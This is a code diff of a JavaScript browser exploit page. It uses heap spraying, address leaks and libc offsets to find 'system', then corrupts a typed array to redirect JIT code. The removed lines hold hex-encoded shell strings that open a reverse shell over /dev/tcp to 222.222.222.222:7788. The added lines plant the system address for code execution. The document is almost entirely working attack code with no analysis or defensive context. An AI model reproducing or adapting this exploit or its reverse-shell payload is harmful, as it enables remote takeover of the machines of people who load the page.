--- a/array.html
+++ b/array.html
@@ -1,5 +1,5 @@
 <script>	
-alert("start8");
+alert("start9");
 function func2(){
 for(var i=0;i<0x1000;i++){ 
 
@@ -145,50 +145,25 @@ var func_addr=(s1.charCodeAt(a+5)<<16)+s1.charCodeAt(a+4);
 //alert(func_addr.toString(16));
 a=arr_addr/2;
 var vftable=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
-a=(vftable+0xF4E4C)/2;
-var fclose_addr=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
-var system_addr=fclose_addr-0x1B040;
+a=(vftable+0x6a30)/2;
+var mmap_addr=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
+var system_addr=mmap_addr-0x6eeac;
 alert(system_addr.toString(16));
 a=(func_addr+0x30)/2;
 var p_addr=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
 a=(p_addr+0x10)/2;
 var jitcode_addr=s1.charCodeAt(a)+(s1.charCodeAt(a+1)<<16);
-alert(jitcode_addr.toString(16));
+//alert(jitcode_addr.toString(16));
 for(var i=typedarray_index;i<typedarray_index+0x40/4;i++){
  spray[spray_index][i]=0;
 }
 spray[spray_index][typedarray_index]=vftable;
 spray[spray_index][typedarray_index+0x30/4]=0x10000;//length
 spray[spray_index][typedarray_index+0x38/4]=jitcode_addr-0x18;//addr;
-spray[spray_index][typedarray_index+0x40/4]=0x6E69622F;// /bin/ping
+spray[spray_index][typedarray_index+0x40/4]=0x0;// /bin/ping
 spray[spray_index][typedarray_index+0x44/4]=0x6E69702F;
 spray[spray_index][typedarray_index+0x48/4]=0x00000067;
-spray[spray_index][typedarray_index+0x60/4]=0x500000a0;
-spray[spray_index][typedarray_index+0x64/4]=0x500000b0;
-spray[spray_index][typedarray_index+0x68/4]=0;//0x500000c0;
-spray[spray_index][typedarray_index+0x6c/4]=0x500000d0;
-spray[spray_index][typedarray_index+0x70/4]=0x500000f0;
-spray[spray_index][typedarray_index+0x74/4]=0x0;
-spray[spray_index][typedarray_index+0x80/4]=0x0;
-spray[spray_index][typedarray_index+0x84/4]=0x0;
-spray[spray_index][typedarray_index+0xa0/4]=0x6E69622F;// /bin/ping
-spray[spray_index][typedarray_index+0xa4/4]=0x6E69702F;
-spray[spray_index][typedarray_index+0xa8/4]=0x00000067;
-spray[spray_index][typedarray_index+0xb0/4]=0x2E323232;//222.222.222.222
-spray[spray_index][typedarray_index+0xb4/4]=0x2E323232;
-spray[spray_index][typedarray_index+0xb8/4]=0x2E323232;
-spray[spray_index][typedarray_index+0xbc/4]=0x00323232;
-spray[spray_index][typedarray_index+0xc0/4]=0x0000263e;//>&
-spray[spray_index][typedarray_index+0xd0/4]=0x7665642F;
-spray[spray_index][typedarray_index+0xd4/4]=0x7063742F;
-spray[spray_index][typedarray_index+0xd8/4]=0x3232322F;
-spray[spray_index][typedarray_index+0xdc/4]=0x3232322E;
-spray[spray_index][typedarray_index+0xe0/4]=0x3232322E;
-spray[spray_index][typedarray_index+0xe4/4]=0x3232322E;
-spray[spray_index][typedarray_index+0xe8/4]=0x3837372F;
-spray[spray_index][typedarray_index+0xec/4]=0x00000038;
-spray[spray_index][typedarray_index+0xf0/4]=0x31263E30;//0>&1
-spray[spray_index][typedarray_index+0xf4/4]=0x0;
+spray[spray_index][typedarray_index+0x100/4]=system_addr;
 var jit_index=typedarray_index+0x38/4;
 var typedarray=spray[spray_index];
 var myarr=arrcvs[0];
